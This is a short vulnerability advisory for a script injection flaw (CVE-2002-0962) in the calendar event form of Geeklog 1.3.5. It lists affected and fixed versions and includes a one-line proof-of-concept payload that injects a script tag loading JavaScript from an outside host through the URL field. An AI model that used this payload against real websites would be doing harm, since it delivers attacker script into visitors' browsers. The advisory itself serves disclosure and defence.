Geeklog Calendar Event Form Script Injection Vulnerability
BID:4974
Info
Geeklog Calendar Event Form Script Injection Vulnerability
| Bugtraq ID: | 4974 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0962 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 10 2002 12:00AM |
| Updated: | Jul 11 2009 01:56PM |
| Credit: | Discovered by Ahmet Sabri ALPER <[email protected]>. |
| Vulnerable: |
Geeklog Geeklog 1.3.5 |
| Not Vulnerable: |
Geeklog Geeklog 1.3.5 sr1 |
Discussion
Geeklog Calendar Event Form Script Injection Vulnerability
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website.
Exploit / POC
Geeklog Calendar Event Form Script Injection Vulnerability
Ahmet Sabri ALPER <[email protected]> has provided the following exploit information:
Link input($url) :&lt;scriptsrc="http://forum.olympos.org/f.js">Alper&lt;/script&gt;
Ahmet Sabri ALPER <[email protected]> has provided the following exploit information:
Link input($url) :&lt;scriptsrc="http://forum.olympos.org/f.js">Alper&lt;/script&gt;